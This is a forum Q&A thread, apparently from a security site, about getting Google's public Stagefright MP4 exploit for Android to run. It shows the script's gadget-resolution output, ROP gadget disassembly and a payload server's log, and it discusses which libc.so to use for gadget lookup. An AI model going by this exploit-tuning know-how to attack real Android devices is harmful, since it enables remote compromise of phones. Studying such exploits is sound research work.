4

Exploit is posted here, however it is missing several things, for example shellcode and it binds to localhost for exploitation, cannot access it from Android device when started on my computer. I modified the two in my version.

To run the exploit I copied the libc.so from Android to the working directory. However pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc cannot be found. I hardcoded them to 0xffffffff just to see if it runs further. How to properly get those values? Which libc.so should I use?

Example Execution:

./mp4_stagefright_release.py

[*] memcpy : 0xb6ecdc08
[*] mmap64 : 0xb6ed42ed
b6ecd034:       e280204c        add     r2, r0, #76     ; 0x4c
b6ecd038:       e8927ff0        ldm     r2, {r4, r5, r6, r7, r8, r9, sl, fp, ip, sp, lr}
b6ecd03c:       e33d0000        teq     sp, #0
b6ecd040:       133e0000        teqne   lr, #0
3068973108
[*] stack_pivot : 0xb6ecd034
b6f0f784:       e49df004        pop     {pc}            ; (ldr pc, [sp], #4)
[*] pop_pc : 0xb6f0f784
[*] pop_r0_r1_r2_r3_pc : 0xffffffff
[*] pop_r4_r5_r6_r7_pc : 0xffffffff
b6f1015c:       e59de040        ldr     lr, [sp, #64]   ; 0x40
b6f10160:       e28dd048        add     sp, sp, #72     ; 0x48
b6f10164:       e12fff1e        bx      lr
[17/Sep/2015:22:21:01] ENGINE Listening for SIGHUP.
[17/Sep/2015:22:21:01] ENGINE Listening for SIGTERM.
[17/Sep/2015:22:21:01] ENGINE Listening for SIGUSR1.
[17/Sep/2015:22:21:01] ENGINE Bus STARTING
CherryPy Checker:
The Application mounted at '' has an empty config.

[17/Sep/2015:22:21:01] ENGINE Started monitor thread 'Autoreloader'.
[17/Sep/2015:22:21:01] ENGINE Started monitor thread '_TimeoutMonitor'.
[17/Sep/2015:22:21:02] ENGINE Serving on http://0.0.0.0:8080
[17/Sep/2015:22:21:02] ENGINE Bus STARTED
StackzOfZtuff
  • 17,783
  • 1
  • 50
  • 86
dev
  • 937
  • 1
  • 8
  • 23
  • This type of question isn't really on topic here. It's not a security question - it's a 'sorting out some code/lib' question – Rory Alsop Sep 21 '15 at 17:55
  • @RoryAlsop Making the Google exploit work is definitely a lot more than just 'sorting out some code/lib'. The exploit makes several big assumption about heap spray location, available gadget in the target Android libc and libc location. Sorting out those issues to reproduce the exploit is all about exploitation technique. – HoLyVieR Sep 22 '15 at 18:30

1 Answers1

0

I'm also dealing with this exploit trying to make it work, I download it from exploit db.

I think the libc.so is from your architecture instead of the Android one because if you see in the code it uses 64bit architecture.

So make a search in your directory for libc.so.

WhiteWinterWolf
  • 19,082
  • 4
  • 58
  • 104
jackdirac
  • 1
  • 1
  • I think it is 32 bit, when I copy it under linux from /usr/lib/x86_64-linux-gnu/libc.so it shows exception, when from /lib32/libc.so.6 it starts to work but cannot find stack_pivot and pop_pc. When I copy it from android, it finds stack_pivot and pop_pc, but not the pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc as I have described in my question. Maybe it helps someone .... – dev Sep 20 '15 at 14:23
  • Hi , you have some update ? now i think that the right libc.so is from an andorid with 64 bit architecture – jackdirac Sep 22 '15 at 11:51